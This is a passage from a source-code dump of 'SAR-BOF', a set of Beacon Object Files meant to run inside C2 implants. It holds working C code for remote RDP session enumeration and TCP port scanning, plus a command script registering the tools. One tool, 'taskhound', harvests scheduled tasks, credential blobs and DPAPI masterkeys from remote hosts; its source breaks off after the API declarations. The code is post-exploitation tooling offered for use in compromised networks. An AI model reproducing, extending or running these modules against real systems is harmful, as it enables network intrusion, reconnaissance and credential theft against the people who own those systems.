    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAR-BOF/quser/quser.c
================================================
#include <windows.h>
#include <wtsapi32.h>
#include "base.c"

DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI WTSAPI32$WTSOpenServerA (LPSTR);
DECLSPEC_IMPORT WINBASEAPI void WINAPI WTSAPI32$WTSCloseServer (HANDLE);

void PrintLogonTime(LARGE_INTEGER logonTime)
{
    FILETIME fileTime;
    SYSTEMTIME systemTime;
    fileTime.dwLowDateTime = logonTime.LowPart;
    fileTime.dwHighDateTime = logonTime.HighPart;

    if (KERNEL32$FileTimeToSystemTime(&fileTime, &systemTime)) {
        internal_printf("%02d/%02d/%d %02d:%02d:%02d\n",
               systemTime.wMonth, systemTime.wDay, systemTime.wYear,
               systemTime.wHour, systemTime.wMinute, systemTime.wSecond);
    } else {
        internal_printf("Failed to convert LogonTime to SystemTime\n");
    }
}

void go(char * args, int alen)
{	
    if(!bofstart()){
        return;
    }
	datap parser;
	PWTS_SESSION_INFOA pwsi;
	DWORD dwCount = 0;
	DWORD bytesReturned = 0;
	BeaconDataParse(&parser, args, alen);
	char *targetHost = BeaconDataExtract(&parser, NULL);
	char *addrFamily = "";
	char *stateInfo = "";
	HANDLE hTarget = NULL;
	LPTSTR userName, userDomain, clientName, clientAddress, sessionInfo;
	PWTS_CLIENT_ADDRESS clientAddressStruct = NULL;
	BOOL successGetSession = 0;
	hTarget = WTSAPI32$WTSOpenServerA(targetHost);
	successGetSession = WTSAPI32$WTSEnumerateSessionsA(hTarget, 0, 1, &pwsi, &dwCount);
	if(!successGetSession){
		if(KERNEL32$GetLastError()==5)
			BeaconPrintf(CALLBACK_OUTPUT, "Access denied: Could not connect to %s.", targetHost);
		else
			BeaconPrintf(CALLBACK_OUTPUT, "ERROR %d: Could not connect to %s.", KERNEL32$GetLastError(), targetHost);
	} else {
		internal_printf("%-20s%-25s%-15s%-15s%-15s%-18s%-25s%s\n", "UserDomain", "UserName", "SessionName", "SessionID" , "State", "SourceAddress", "SourceClientName", "LogonTime");
		for (unsigned int i = 0; i < dwCount; i++)
		{
			WTS_SESSION_INFO si = pwsi[i];
			if(si.SessionId > 2048 || si.SessionId < 0)
				continue;
			BOOL getResult;
			getResult = WTSAPI32$WTSQuerySessionInformationA(hTarget, si.SessionId, WTSUserName, &userName, &bytesReturned);
			if(!getResult){
				userName = "N/A";
				BeaconPrintf(CALLBACK_ERROR, "ERROR %d on getting attribute using WTSQuerySessionInformationA", KERNEL32$GetLastError());
			}
			getResult = WTSAPI32$WTSQuerySessionInformationA(hTarget, si.SessionId, WTSDomainName, &userDomain, &bytesReturned);
			if(!getResult){
				userDomain = "N/A";
				BeaconPrintf(CALLBACK_ERROR, "ERROR %d on getting attribute using WTSQuerySessionInformationA", KERNEL32$GetLastError());
			}
			getResult = WTSAPI32$WTSQuerySessionInformationA(hTarget, si.SessionId, WTSClientName, &clientName, &bytesReturned);
			if(!getResult){
				clientName = "N/A";
				BeaconPrintf(CALLBACK_ERROR, "ERROR %d on getting attribute using WTSQuerySessionInformationA", KERNEL32$GetLastError());
			}
			getResult = WTSAPI32$WTSQuerySessionInformationA(hTarget, si.SessionId, WTSClientAddress, &clientAddress, &bytesReturned);
			if(!getResult){
				clientAddress = "N/A";
				BeaconPrintf(CALLBACK_ERROR, "ERROR %d on getting attribute using WTSQuerySessionInformationA", KERNEL32$GetLastError());
			}
			WTSINFO* wtsInfo = NULL;
			getResult = WTSAPI32$WTSQuerySessionInformationA(hTarget, si.SessionId, WTSLogonTime, &sessionInfo, &bytesReturned);
			if (getResult && bytesReturned == sizeof(LARGE_INTEGER)) {
				//Second scenario
				WTSAPI32$WTSFreeMemory(sessionInfo);
			}
			else {
				getResult = WTSAPI32$WTSQuerySessionInformationA(hTarget, si.SessionId, WTSSessionInfo, &sessionInfo, &bytesReturned);
				if (getResult) {
					wtsInfo = (WTSINFO*)sessionInfo;					
					WTSAPI32$WTSFreeMemory(sessionInfo);
				}
			}
			clientAddressStruct = (PWTS_CLIENT_ADDRESS)clientAddress;
			if(clientAddressStruct->AddressFamily == 0)
				addrFamily = "Unspecified";
			else if(clientAddressStruct->AddressFamily == 2)
				addrFamily = "InterNetwork";
			else if(clientAddressStruct->AddressFamily == 17)
				addrFamily = "NetBios";
			else 
				addrFamily = "Unknown";
			if(strlen(userName)){
				if(si.State == WTSActive)
					stateInfo = "Active";
				else if(si.State == WTSConnected)
					stateInfo = "Connected";
				else if(si.State == WTSDisconnected)
					stateInfo = "Disconnected";
				else if(si.State == WTSIdle)
					stateInfo = "Idle";
				else 
					stateInfo = "Unknown";
				if(addrFamily == "Unspecified"){
                    internal_printf("%-20s%-25s%-15s%-15i%-15s%-18s%-25s", userDomain, userName, si.pWinStationName, si.SessionId, stateInfo, "-", "-");
					PrintLogonTime(wtsInfo->LogonTime);
				}
                else{
                    internal_printf("%-20s%-25s%-15s%-15i%-15s%u.%u.%u.%-10u%-25s", userDomain, userName, si.pWinStationName, si.SessionId, stateInfo, clientAddressStruct->Address[2], clientAddressStruct->Address[3], clientAddressStruct->Address[4], clientAddressStruct->Address[5], clientName);
					PrintLogonTime(wtsInfo->LogonTime);
				}
			}
		}
	}
    printoutput(TRUE);
	WTSAPI32$WTSFreeMemory(pwsi);
	WTSAPI32$WTSCloseServer(hTarget);
    bofstop();
};

================================================
FILE: SAR-BOF/sar.axs
================================================
var metadata = {
    name: "SAR-BOF",
    description: "Situation Awareness Remote BOFs"
};

var cmd_smartscan = ax.create_command("smartscan", "Smart port scan", "smartscan 192.168.1.1 -p 80,443,22-25");
cmd_smartscan.addArgString("target", true, "Destination IP address, range or CIDR format (for example: '192.168.1.1' , '192.168.1.1-192.168.1.10' , '192.168.1.1,192.168.1.3' or '192.168.1.1/24')");
cmd_smartscan.addArgFlagString("-p", "ports", "Port range: 'fast', 'standart', 'full', or custom ports (e.g. 80,443,22-25,3389)", "standart");
cmd_smartscan.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let target = parsed_json["target"];
    let ports = parsed_json["ports"];

    let scan_level = 0;
    let custom_ports = "";

    if (ports === "fast") {
        scan_level = 1;
    }
    else if (ports === "standart") {
        scan_level = 2;
    }
    else if (ports === "full") {
        scan_level = 3;
    }
    else if (ports) {
        custom_ports = ports;
    }

    let bof_params = ax.bof_pack("cstr,int,cstr", [target, scan_level, custom_ports]);
    let bof_path = ax.script_dir() + "_bin/smartscan." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof -a "${bof_path}" ${bof_params}`, "Scan Target: " + target);
});



var cmd_taskhound = ax.create_command("taskhound",
    "Collect scheduled tasks from remote systems",
    "taskhound 192.168.1.100 -u domain\\admin -p password -save C:\\Output -unsaved-creds -grab-blobs");
cmd_taskhound.addArgString("target", true, "Remote system to collect from (IP or hostname)");
cmd_taskhound.addArgFlagString("-u", "username", "Username for authentication", "");
cmd_taskhound.addArgFlagString("-p", "password", "Password for authentication", "");
cmd_taskhound.addArgFlagString("-save", "save_directory", "Directory to save XML files", "");
cmd_taskhound.addArgBool("-unsaved-creds", "Show tasks without stored credentials");
cmd_taskhound.addArgBool("-grab-blobs", "Also collect credential blobs and masterkeys (requires -save)");

cmd_taskhound.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let target = parsed_json["target"];
    let username = parsed_json["username"] || "";
    let password = parsed_json["password"] || "";
    let save_dir = parsed_json["save_directory"] || "";
    let flags = "";

    if(parsed_json["-unsaved-creds"]) { flags += "-unsaved-creds "; }
    if(parsed_json["-grab-blobs"]) { flags += "-grab-blobs"; }
    flags = flags.trim();

    let bof_params = ax.bof_pack("cstr,cstr,cstr,cstr,cstr", [target, username, password, save_dir, flags]);

    let bof_path = ax.script_dir() + "_bin/taskhound." + ax.arch(id) + ".o";
    let message = `Taskhound from ${target}`;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



var cmd_quser = ax.create_command("quser", "Query user sessions on a remote machine, providing session information", "quser MainDC");
cmd_quser.addArgString("host", "", "localhost");
cmd_quser.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let host = parsed_json["host"];

    let bof_params = ax.bof_pack("cstr", [host]);
    let bof_path = ax.script_dir() + "_bin/quser." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "BOF implementation: quser");
});



var cmd_nbtscan = ax.create_command("nbtscan", "NetBIOS name scanner (nbtscan-like)", "nbtscan 192.168.1.0/24 -v");
cmd_nbtscan.addArgString("target", true, "Destination IP address, range or CIDR (e.g. '192.168.1.1', '192.168.1.1-192.168.1.20', '192.168.1.0/24', '192.168.1.1,192.168.1.5')");
cmd_nbtscan.addArgBool("-v", "verbose");
cmd_nbtscan.addArgBool("-q", "quiet");
cmd_nbtscan.addArgBool("-e", "etc_hosts");
cmd_nbtscan.addArgBool("-l", "lmhosts");
cmd_nbtscan.addArgFlagString("-s", "separator", "Script-friendly output separator (enables script mode)", "");
cmd_nbtscan.addArgFlagString("-t", "timeout", "Response timeout in milliseconds (default 1000)", "");
cmd_nbtscan.addArgBool("-no-targets", "Disable automatic target registration");
cmd_nbtscan.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let target    = parsed_json["target"];
    let verbose   = parsed_json["-v"] ? 1 : 0;
    let quiet     = parsed_json["-q"] ? 1 : 0;
    let etc_hosts = parsed_json["-e"] ? 1 : 0;
    let lmhosts   = parsed_json["-l"] ? 1 : 0;
    let sep       = parsed_json["separator"] || "";
    let timeout_s = parsed_json["timeout"] || "";
    let no_targets = parsed_json["-no-targets"] ? 1 : 0;

    let timeout_ms = 1000;
    if (timeout_s) {
        let parsed = parseInt(timeout_s, 10);
        if (!isNaN(parsed) && parsed > 0 && parsed < 600000) {
            timeout_ms = parsed;
        }
    }

    let bof_params = ax.bof_pack("cstr,int,int,int,int,cstr,int", [ target, verbose, quiet, etc_hosts, lmhosts, sep, timeout_ms ]);
    let bof_path = ax.script_dir() + "_bin/nbtscan." + ax.arch(id) + ".o";
    let message = "NBTscan: " + target;

    if(no_targets == 1) {
        ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
    }
    else {
        let targets_handler = function (task) {
            let blocks = task.text.trim().split('\n');
            var results = [];
            const ipRegex = /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s+([^\s]+)\s+([^\s]+)/;
            for (const line of blocks) {

                if (results.length > 1000) {
                    ax.targets_add_list(results);
                    results.length = 0;
                }

                const match = line.trim().match(ipRegex);
                if (!match)
                    continue;

                const [, ip, netbiosName, domain] = match;

                const octets = ip.split('.');
                const isValid = octets.length === 4 &&
                    octets.every(octet => {
                        const num = parseInt(octet, 10);
                        return num >= 0 && num <= 255 && /^\d+$/.test(octet);
                    });
                if (!isValid)
                    continue;

                const obj = {
                    address: ip,
                    computer: netbiosName,
                    domain: domain,
                    alive: true,
                    info: "collected from nbtscan"
                };
                results.push(obj);
            }
            if (results.length > 0) ax.targets_add_list(results);
            return task;
        }

        ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message, targets_handler);
    }
});

var group_test = ax.create_commands_group("SAR-BOF", [cmd_smartscan, cmd_taskhound, cmd_quser, cmd_nbtscan]);
ax.register_commands_group(group_test, ["beacon", "gopher", "kharon"], ["windows"], []);

================================================
FILE: SAR-BOF/smartscan/portscan_simple.c
================================================
#include <winsock2.h>
#include <windows.h>

#include "beacon.h"
#include "bofdefs.h"

__declspec(dllimport) unsigned long __stdcall WS2_32$inet_addr(const char *cp);
__declspec(dllimport) unsigned short __stdcall WS2_32$htons(unsigned short hostshort);
__declspec(dllimport) unsigned long __stdcall WS2_32$ntohl(unsigned long netlong);
DECLSPEC_IMPORT unsigned int __stdcall WS2_32$socket(int af, int type, int protocol);
__declspec(dllimport) int __stdcall WS2_32$ioctlsocket(SOCKET, long, u_long*);
__declspec(dllimport) int __stdcall WS2_32$connect(SOCKET, const struct sockaddr*, int);
__declspec(dllimport) int __stdcall WS2_32$select(int, fd_set*, fd_set*, fd_set*, const struct timeval*);
__declspec(dllimport) int __stdcall WS2_32$closesocket(SOCKET);
__declspec(dllimport) int __stdcall WS2_32$inet_pton(int, const char*, void*);
__declspec(dllimport) char* __stdcall WS2_32$inet_ntoa(struct in_addr);
__declspec(dllimport) int __stdcall WS2_32$WSAStartup(WORD, LPWSADATA);
__declspec(dllimport) int __stdcall WS2_32$WSACleanup(void);
__declspec(dllimport) int __stdcall WS2_32$getsockopt(SOCKET s, int level, int optname, char *optval, int *optlen);
__declspec(dllimport) unsigned long __stdcall WS2_32$htonl(unsigned long hostlong);

#define DEFAULT_TIMEOUT    2000
#define MAX_PORTS          200
#define MAX_CONCURRENT     10
#define SCAN_BATCH_SIZE    8
#define BATCH_DELAY_MS     30

int g_level1_ports[] = {
    80, 443, 8080, 8443,
    1433, 1521, 3306, 5432, 6379, 27017,
    0
};

int g_level2_ports[] = {
    80, 443, 8080, 8443,
    1433, 1521, 3306, 5432, 6379, 27017,
    135, 139, 445, 3389, 5985, 5986,
    22,
    21, 25, 53, 110, 143, 993, 995,
    0
};

int g_level3_ports[] = {
    80, 443, 8080, 8443, 8000, 8888,
    1433, 1521, 3306, 5432, 6379, 27017, 9200, 9300,
    135, 139, 445, 3389, 5985, 5986, 88, 389, 636, 3268, 3269,
    22, 23,
    21, 25, 53, 69, 110, 111, 143, 993, 995,
    7, 9, 13, 19, 37, 79, 113, 119, 1025, 1434, 1604, 1723, 2000, 2001, 2048, 2049, 2100, 3128, 5000, 5060, 5061, 5900, 6000, 6667, 8081, 9000, 10000, 11211,
    0
};

void bofstart() {}
void bofstop() {}

int tcp_port_scan(const char* ip, int port, int timeout)
{
    SOCKET sock = WS2_32$socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        return 0;
    }

    u_long mode = 1;
    WS2_32$ioctlsocket(sock, FIONBIO, &mode);

    struct sockaddr_in addr;
    MSVCRT$memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = WS2_32$htons((unsigned short)port);

    unsigned long a = WS2_32$inet_addr(ip);
    if (a == INADDR_NONE) {
        WS2_32$closesocket(sock);
        return 0;
    }
    addr.sin_addr.s_addr = a;

    WS2_32$connect(sock, (struct sockaddr*)&addr, sizeof(addr));

    fd_set write_set;
    FD_ZERO(&write_set);
    FD_SET(sock, &write_set);

    struct timeval tv;
    tv.tv_sec = timeout / 1000;
    tv.tv_usec = (timeout % 1000) * 1000;

    int result = WS2_32$select((int)(sock + 1), NULL, &write_set, NULL, &tv);

    if (result > 0) {
        int err = 0;
        int len = sizeof(err);
        if (WS2_32$getsockopt(sock, SOL_SOCKET, SO_ERROR, (char*)&err, &len) == 0) {
            WS2_32$closesocket(sock);
            if (err == 0) {
                return 1;
            } else {
                return 0;
            }
        } else {
            WS2_32$closesocket(sock);
            return 0;
        }
    }

    WS2_32$closesocket(sock);
    return 0;
}


const char* get_service_name(int port)
{
    switch (port) {
        case 21: return "ftp";
        case 22: return "ssh";
        case 23: return "telnet";
        case 25: return "smtp";
        case 53: return "dns";
        case 69: return "tftp";
        case 70: return "gopher";
        case 79: return "finger";
        case 80: return "http";
        case 88: return "kerberos";
        case 110: return "pop3";
        case 135: return "rpc";
        case 139: return "netbios";
        case 143: return "imap";
        case 443: return "https";
        case 445: return "smb";
        case 993: return "imaps";
        case 995: return "pop3s";
        case 1433: return "mssql";
        case 1521: return "oracle";
        case 3306: return "mysql";
        case 3389: return "rdp";
        case 5432: return "postgres";
        case 5985: return "winrm";
        case 5986: return "winrm-ssl";
        case 6379: return "redis";
        case 8080: return "http-alt";
        case 8443: return "https-alt";
        case 27017: return "mongodb";
        default:
            if (port >= 70 && port <= 90) {
                return "custom";
            }
            return "unknown";
    }
}

int parse_single_ip(const char* target, char* ip_str)
{
    MSVCRT$strcpy(ip_str, target);
    return 1;
}

int parse_cidr_simple(const char* cidr, char*** ip_list, int* count)
{
    char base_ip[16];
    char* slash = MSVCRT$strchr(cidr, '/');

    if (!slash) {
        return 0;
    }

    int ip_len = slash - cidr;
    if (ip_len >= 16) {
        return 0;
    }

    MSVCRT$memcpy(base_ip, cidr, ip_len);
    base_ip[ip_len] = '\0';

    int mask = 0;
    const char* mask_ptr = slash + 1;
    while (*mask_ptr >= '0' && *mask_ptr <= '9') {
        mask = mask * 10 + (*mask_ptr - '0');
        mask_ptr++;
    }

    if (mask != 24) {
        BeaconPrintf(CALLBACK_ERROR, "Only /24 CIDR notation supported in this version\n");
        return 0;
    }

    char* last_dot = NULL;
    for (int i = 0; base_ip[i]; i++) {
        if (base_ip[i] == '.') {
            last_dot = &base_ip[i];
        }
    }
    if (!last_dot) {
        return 0;
    }

    int network_len = last_dot - base_ip + 1;

    *count = 254;
    *ip_list = (char**)intAlloc(*count * sizeof(char*));
    if (!*ip_list) {
        return 0;
    }

    for (int i = 0; i < *count; i++) {
        (*ip_list)[i] = (char*)intAlloc(16 * sizeof(char));
        if (!(*ip_list)[i]) {
            break;
        }

        MSVCRT$memcpy((*ip_list)[i], base_ip, network_len);
        MSVCRT$sprintf((*ip_list)[i] + network_len, "%d", i + 1);
    }

    return 1;
}

int parse_target_list_extended(const char* targets, char*** ip_list, int* count)
{
    if (!targets || !targets[0]) return 0;

    char* copy = (char*)intAlloc(MSVCRT$strlen(targets) + 1);
    if (!copy) return 0;
    MSVCRT$strcpy(copy, targets);

    char* token = MSVCRT$strtok(copy, ",");
    char** result = NULL;
    int total = 0;

    while (token)
    {
        while (*token == ' ') token++;

        char* end = token + MSVCRT$strlen(token) - 1;
        while (end > token && (*end == ' ' || *end == '\r' || *end == '\n')) *end-- = '\0';

        char** tmp_list = NULL;
        int tmp_count = 0;

        if (MSVCRT$strchr(token, '/')) {
            if (!parse_cidr_simple(token, &tmp_list, &tmp_count)) {
                BeaconPrintf(CALLBACK_ERROR, "Invalid CIDR: %s\n", token);
                token = MSVCRT$strtok(NULL, ",");
                continue;
            }
        }
        else if (MSVCRT$strchr(token, '-')) {
            char start_ip[32] = {0}, end_ip[32] = {0};
            char* dash = MSVCRT$strchr(token, '-');
            if (!dash) { token = MSVCRT$strtok(NULL, ","); continue; }

            *dash = '\0';
            MSVCRT$strcpy(start_ip, token);
            MSVCRT$strcpy(end_ip, dash + 1);

            unsigned long start_a = WS2_32$inet_addr(start_ip);
            unsigned long end_a   = WS2_32$inet_addr(end_ip);

            if (start_a == INADDR_NONE || end_a == INADDR_NONE) {
                BeaconPrintf(CALLBACK_ERROR, "Invalid IP range: %s-%s\n", start_ip, end_ip);
                token = MSVCRT$strtok(NULL, ",");
                continue;
            }

            DWORD start = WS2_32$ntohl(start_a);
            DWORD end   = WS2_32$ntohl(end_a);
            if (end < start) {
                DWORD tmp = start; start = end; end = tmp;
            }

            DWORD range_size = end - start + 1;
            if (range_size > 1024) range_size = 1024;

            tmp_list = (char**)intAlloc(range_size * sizeof(char*));
            if (!tmp_list) break;

            for (DWORD i = 0; i < range_size; i++) {
                struct in_addr addr;
                addr.s_addr = WS2_32$htonl(start + i);
                tmp_list[i] = (char*)intAlloc(16);
                char *s = WS2_32$inet_ntoa(addr);
                if (s) {
                    MSVCRT$strcpy(tmp_list[i], s);
                } else {
                    MSVCRT$strcpy(tmp_list[i], "0.0.0.0");
                }
            }
            tmp_count = (int)range_size;
        }
        else {
            tmp_list = (char**)intAlloc(sizeof(char*));
            tmp_list[0] = (char*)intAlloc(16);
            MSVCRT$strcpy(tmp_list[0], token);
            tmp_count = 1;
        }

        char** new_result = (char**)intAlloc((total + tmp_count) * sizeof(char*));
        if (result) {
            for (int i = 0; i < total; i++) new_result[i] = result[i];
            intFree(result);
        }
        for (int j = 0; j < tmp_count; j++) new_result[total + j] = tmp_list[j];
        intFree(tmp_list);

        total += tmp_count;
        result = new_result;

        token = MSVCRT$strtok(NULL, ",");
    }

    intFree(copy);
    *ip_list = result;
    *count = total;

    return (total > 0);
}


int* parse_custom_ports(const char* port_spec, int* count)
{
    if (!port_spec || !port_spec[0]) {
        return NULL;
    }

    char* spec_copy = (char*)intAlloc(MSVCRT$strlen(port_spec) + 1);
    if (!spec_copy) {
        return NULL;
    }
    MSVCRT$strcpy(spec_copy, port_spec);

    *count = 0;
    char* token = MSVCRT$strtok(spec_copy, ",");
    while (token) {
        while (*token == ' ') token++;

        char* dash = MSVCRT$strchr(token, '-');
        if (dash) {
            int start_port = 0, end_port = 0;

            char* ptr = token;
            while (*ptr >= '0' && *ptr <= '9') {
                start_port = start_port * 10 + (*ptr - '0');
                ptr++;
            }

            ptr = dash + 1;

            while (*ptr >= '0' && *ptr <= '9') {
                end_port = end_port * 10 + (*ptr - '0');
                ptr++;
            }

            if (start_port > 0 && end_port > 0 && start_port <= end_port && end_port <= 65535) {
                int range_count = end_port - start_port + 1;
                if (range_count > 1000) {
                    range_count = 1000;
                }
                *count += range_count;
            }
        } else {
            int port = 0;
            char* ptr = token;
            while (*ptr >= '0' && *ptr <= '9') {
                port = port * 10 + (*ptr - '0');
                ptr++;
            }

            if (port > 0 && port <= 65535) {
                (*count)++;
            }
        }

        token = MSVCRT$strtok(NULL, ",");
    }

    if (*count == 0) {
        intFree(spec_copy);
        return NULL;
    }

    int* ports = (int*)intAlloc(*count * sizeof(int));
    if (!ports) {
        intFree(spec_copy);
        return NULL;
    }

    MSVCRT$strcpy(spec_copy, port_spec);
    int port_index = 0;

    token = MSVCRT$strtok(spec_copy, ",");
    while (token && port_index < *count) {
        while (*token == ' ') token++;

        char* dash = MSVCRT$strchr(token, '-');
        if (dash) {
            int start_port = 0, end_port = 0;

            char* ptr = token;
            while (*ptr >= '0' && *ptr <= '9') {
                start_port = start_port * 10 + (*ptr - '0');
                ptr++;
            }

            ptr = dash + 1;

            while (*ptr >= '0' && *ptr <= '9') {
                end_port = end_port * 10 + (*ptr - '0');
                ptr++;
            }

            if (start_port > 0 && end_port > 0 && start_port <= end_port && end_port <= 65535) {
                int range_count = end_port - start_port + 1;
                if (range_count > 1000) {
                    range_count = 1000;
                    end_port = start_port + 999;
                }

                for (int i = 0; i < range_count && port_index < *count; i++) {
                    ports[port_index++] = start_port + i;
                }
            }
        } else {
            int port = 0;
            char* ptr = token;
            while (*ptr >= '0' && *ptr <= '9') {
                port = port * 10 + (*ptr - '0');
                ptr++;
            }

            if (port > 0 && port <= 65535) {
                ports[port_index++] = port;
            }
        }

        token = MSVCRT$strtok(NULL, ",");
    }

    intFree(spec_copy);
    return ports;
}

void simple_port_scan(const char* target, int scan_level, const char* custom_ports)
{
    char** ip_list = NULL;
    int ip_count = 0;
    int* ports = NULL;
    int port_count = 0;
    int free_ports = 0;
    int need_cleanup_wsa = 0;

    BeaconPrintf(CALLBACK_OUTPUT, "[*] Starting port scan for: %s\n", target);

    WSADATA wsa;
    if (WS2_32$WSAStartup(MAKEWORD(2,2), &wsa) != 0) {
        BeaconPrintf(CALLBACK_ERROR, "WSAStartup failed\n");
        return;
    }
    need_cleanup_wsa = 1;

    if (!parse_target_list_extended(target, &ip_list, &ip_count)) {
        BeaconPrintf(CALLBACK_ERROR, "Failed to parse targets: %s\n", target);
        goto cleanup;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Scanning %d hosts\n", ip_count);

    if (scan_level == 0 && custom_ports && custom_ports[0]) {
        ports = parse_custom_ports(custom_ports, &port_count);
        if (ports) {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Using custom ports: %s (%d ports)\n", custom_ports, port_count);
            free_ports = 1;
        } else {
            BeaconPrintf(CALLBACK_ERROR, "Invalid custom port specification: %s\n", custom_ports);
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Using default port list instead\n");
            scan_level = 2;
        }
    }

    if (scan_level > 0) {
        switch (scan_level) {
            case 1:
                ports = g_level1_ports;
                for (port_count = 0; g_level1_ports[port_count] != 0; port_count++);
                BeaconPrintf(CALLBACK_OUTPUT, "[*] Level 1 scan: Web & Database ports (%d ports)\n", port_count);
                break;
            case 2:
                ports = g_level2_ports;
                for (port_count = 0; g_level2_ports[port_count] != 0; port_count++);
                BeaconPrintf(CALLBACK_OUTPUT, "[*] Level 2 scan: Web, Database & OS-specific ports (%d ports)\n", port_count);
                break;
            case 3:
                ports = g_level3_ports;
                for (port_count = 0; g_level3_ports[port_count] != 0; port_count++);
                BeaconPrintf(CALLBACK_OUTPUT, "[*] Level 3 scan: Comprehensive ports (%d ports)\n", port_count);
                break;
            default:
                ports = g_level2_ports;
                for (port_count = 0; g_level2_ports[port_count] != 0; port_count++);
                BeaconPrintf(CALLBACK_OUTPUT, "[*] Default scan: Web, Database & OS-specific ports (%d ports)\n", port_count);
        }
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[*] Scanning %d ports\n", port_count);

    int total_open_ports = 0;
    for (int i = 0; i < ip_count; i++) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Scanning %s...\n", ip_list[i]);

        int host_open_ports = 0;

        for (int batch_start = 0; batch_start < port_count; batch_start += SCAN_BATCH_SIZE) {
            int batch_end = batch_start + SCAN_BATCH_SIZE;
            if (batch_end > port_count) {
                batch_end = port_count;
            }

            for (int j = batch_start; j < batch_end; j++) {
                int port = ports[j];
                int state = tcp_port_scan(ip_list[i], port, DEFAULT_TIMEOUT);

                if (state > 0) {
                    BeaconPrintf(CALLBACK_OUTPUT, "  [+] Port %d (%s) - OPEN\n",
                               port, get_service_name(port));
                    host_open_ports++;
                    total_open_ports++;
                }
            }

            if (batch_end < port_count) {
                KERNEL32$Sleep(BATCH_DELAY_MS);
            }
        }

        if (host_open_ports > 0) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Host %s: %d open ports found\n",
                       ip_list[i], host_open_ports);
        }

        if (ip_count > 10 && (i + 1) % 10 == 0) {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Progress: %d/%d hosts scanned\n", i + 1, ip_count);
        }
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Scan completed. Found %d open ports total.\n", total_open_ports);

cleanup:
    if (ip_list) {
        for (int i = 0; i < ip_count; i++) {
            if (ip_list[i]) {
                intFree(ip_list[i]);
            }
        }
        intFree(ip_list);
        ip_list = NULL;
    }

    if (free_ports && ports) {
        intFree(ports);
        ports = NULL;
    }

    if (need_cleanup_wsa) {
        WS2_32$WSACleanup();
    }
}


int go(char* args, int len)
{
    char target[256] = {0};
    int scan_level = 2;
    char custom_ports[512] = {0};

    datap parser;
    BeaconDataParse(&parser, args, len);

    int target_size = 0;
    char* target_ptr = BeaconDataExtract(&parser, &target_size);
    if (target_ptr && target_size > 0) {
        MSVCRT$memcpy(target, target_ptr, target_size);
        target[target_size] = '\0';
    } else {
        BeaconPrintf(CALLBACK_ERROR, "Parameters are not supported\n");
        return 0;
    }

    scan_level = BeaconDataInt(&parser);

    int ports_size = 0;
    char* ports_ptr = BeaconDataExtract(&parser, &ports_size);
    if (ports_ptr && ports_size > 0) {
        MSVCRT$memcpy(custom_ports, ports_ptr, ports_size);
        custom_ports[ports_size] = '\0';
    }

    simple_port_scan(target, scan_level, custom_ports);

    return 0;
}

================================================
FILE: SAR-BOF/taskhound/taskhound.c
================================================
#include <windows.h>
#include "beacon.h"

#ifdef BOF
void ___chkstk_ms(void){}
void __chkstk_ms(void){}
#endif

// Constants
#define MAX_PATH_LENGTH 1024
#define MAX_BUFFER_SIZE 8192
#define MAX_STRING_LENGTH 512
#define MAX_OUTPUT_LINE_SIZE 2048
#define MAX_FILE_SIZE 1048576  // 1MB file size limit
#define UTF16_BOM_SIZE 2
#define XML_BOM_CHECK_SIZE 1000

// Prevent any accidental use of C library functions
#define strlen bof_strlen

// ============================================================================
// Windows API Function Pointers
// ============================================================================

// MPR.dll (Network Resource API)
typedef DWORD (WINAPI *pWNetAddConnection2A)(LPNETRESOURCEA, LPCSTR, LPCSTR, DWORD);
typedef DWORD (WINAPI *pWNetCancelConnection2A)(LPCSTR, DWORD, BOOL);

// KERNEL32.dll (File System & Memory Management)
typedef HANDLE (WINAPI *pFindFirstFileA)(LPCSTR, LPWIN32_FIND_DATAA);
typedef BOOL (WINAPI *pFindNextFileA)(HANDLE, LPWIN32_FIND_DATAA);
typedef BOOL (WINAPI *pFindClose)(HANDLE);
typedef HANDLE (WINAPI *pCreateFileA)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
typedef BOOL (WINAPI *pReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED);
typedef BOOL (WINAPI *pWriteFile)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
typedef BOOL (WINAPI *pCloseHandle)(HANDLE);
typedef DWORD (WINAPI *pGetFileSize)(HANDLE, LPDWORD);
typedef BOOL (WINAPI *pCreateDirectoryA)(LPCSTR, LPSECURITY_ATTRIBUTES);
typedef LPVOID (WINAPI *pVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
typedef BOOL (WINAPI *pVirtualFree)(LPVOID, SIZE_T, DWORD);
typedef DWORD (WINAPI *pGetLastError)(VOID);

// ============================================================================
